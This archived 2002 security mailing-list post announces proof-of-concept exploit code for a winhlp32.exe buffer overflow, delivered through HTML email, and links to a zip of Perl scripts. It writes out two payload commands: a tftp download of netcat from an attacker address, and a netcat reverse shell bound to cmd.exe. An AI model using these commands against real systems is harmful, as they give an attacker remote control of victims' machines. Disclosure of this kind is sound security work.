winhlp32.exe buffer overflow exploit code.

From: Gary O'leary-Steele (garyo@sec-1.com)
Date: Mon Aug 12 2002 - 08:22:10 PDT


    Hello all,
    
    
    For some reason my previous posts did not make it onto SecurityFocus ?-)
    
    The following is a link to proof-of-concept / exploit code for this
    overflow. The shellcode is relatively small but effective if used
    correctly. The Perl script takes a command to execute (WinExec, SW_HIDE) and
    an HTML output file. There are two versions included in the zip.
    
    http://www.sec-1.com/help.zip
    
    HelpMe.pl   // Was written to work with my machine's Kernel32.dll version
    5.0.2195.4272 (Rare?)
    
    HelpMe2.pl  // Was written to work with all other machines I tested.
    kernel32.dll version 5.0.2195.2778
    
    
    I have tested the exploit using two HTML emails.
    
    email 1     Executes tftp.exe -i my.ip.address get nc.exe
    c:\winnt\system32\nc.exe
    
    email 2     Executes nc.exe my.ip.address 80 -e cmd.exe
    
    If the exploit executes correctly ExitProcess() is called so no error occurs.
    
    
    Kind Regards
    Gary O'leary-Steele
    XScan Team
    www.Sec-1.com
    